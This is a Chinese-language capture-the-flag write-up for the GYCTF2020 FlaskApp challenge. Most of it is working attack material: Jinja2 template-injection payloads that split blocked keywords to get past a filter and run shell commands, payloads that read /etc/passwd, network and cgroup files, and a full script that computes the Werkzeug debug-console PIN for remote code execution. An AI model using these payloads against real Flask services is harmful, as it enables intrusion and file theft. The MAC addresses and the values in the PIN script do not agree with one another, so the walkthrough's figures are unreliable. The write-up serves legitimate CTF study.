[GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp,第1张

目录

进来有提示就看提示!摆烂的大动作!

计算pin码

我们可以查看/etc/passwd文件。


使用如下命令

getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

当前电脑的MAC地址

机器的ID

总结:


进来有提示就看提示!摆烂的大动作!

 

入手点看来是失败了加密不可能失败,那就只能是解密失败了!解密失败后出现

 

debug模式,读取到了部分源码

@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)

根据代码我们知道加密后的代码经过waf后会被直接渲染,想起来这个名字是flask,那么可能存在ssti注入了!

验证一下吧!加密{{1+1}}得到e3sxKzF9fQ==然后解密一下得到2说明存在ssti注入

简单fuzz后发现过滤了flag、import、os、eval等关键词,我们用拆分bypass!

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

加密后解密

拼接拿flag

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
计算pin码

看到可以登录控制台同时,但是不太了解这个debug控制台的pin值,百度一下。


好像这个是预期解。




想要拿到PIN码必须知道:

1.运行app的用户名,读/etc/passwd

2.module name 一般固定为flask.app

3.getattr(app, "\_\_name\_\_", app.\_\_class\_\_.\_\_name\_\_)的结果。


就是Flask 4.flask库下app.py的绝对路径,不是当前运行的app.py的路径,在debug模式下报错就能直接看见,该题为/usr/local/lib/python3.7/site-packages/flask/app.py 5.当前网络的mac地址的十进制数。


通过文件/sys/class/net/eth0/address读取,eth0为当前使用的网卡,如果有多个网卡数字可能会变,这里为02:42:ae:00:c3:58,转十进制为 2485410382680 6.机器的id 对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同,假如是在win平台下读取不到上面两个文件,就去获取注册表中SOFTWARE\Microsoft\Cryptography的值。


对于docker机则读取/proc/self/cgroup,序列号为1那行 1:name=systemd:/docker/210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c

我们可以查看/etc/passwd文件。


使用如下命令

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /etc/passwd").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}

这两种都可以读取,这样我们可以知道是flaskweb用户。


getattr(mod, ‘file’, None)flask目录下的app.py的绝对路径

报错信息告诉我们

/usr/local/lib/python3.7/site-packages/flask/app.py
当前电脑的MAC地址

我们可以读取/sys/class/net/eth0/address来获得mac的16进制:

{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/sys/class/net/eth0/address').read()}}

得到a6:ac:19:45:f1:d8将其转10进制183258088600024许多工具都不准确,值得注意。


可以采用本地用python跑的方式,在本地python输入

>>> print(int('a6ac1945f1d8',16))
183258088600024
机器的ID

读取/proc/self/cgroup获取get_machine_id()

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

 

 

1:name=systemd:/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcc096863_49c3_4caa_b633_05615b822d2b.slice/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332

我们要的是

1:name=systemd:/docker-b6ff692442683c70ab69d01d5310a9aba4d3014fc147c329891658c0e2048332

计算PIN码:

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
 
private_bits = [
    '2485377871838',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '4e2d4390ee2a9b57df253521f44301973efc74e35a300a02b4e509d60989543b'# get_machine_id(), /etc/machine-id
]
 
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

将得到的PIN码在Debug页面输入进入控制台,既可以执行python shell了:

os.popen('cat /this_is_the_flag.txt').read()
总结:

又见到了ssti注入,可以拼接绕过!

又学到了pin码计算,不要开启dubug模式

感谢buu提供优质的题,感谢勤劳的自己!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/568414.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-09
下一篇 2022-04-09

发表评论

登录后才能评论

评论列表(0条)

保存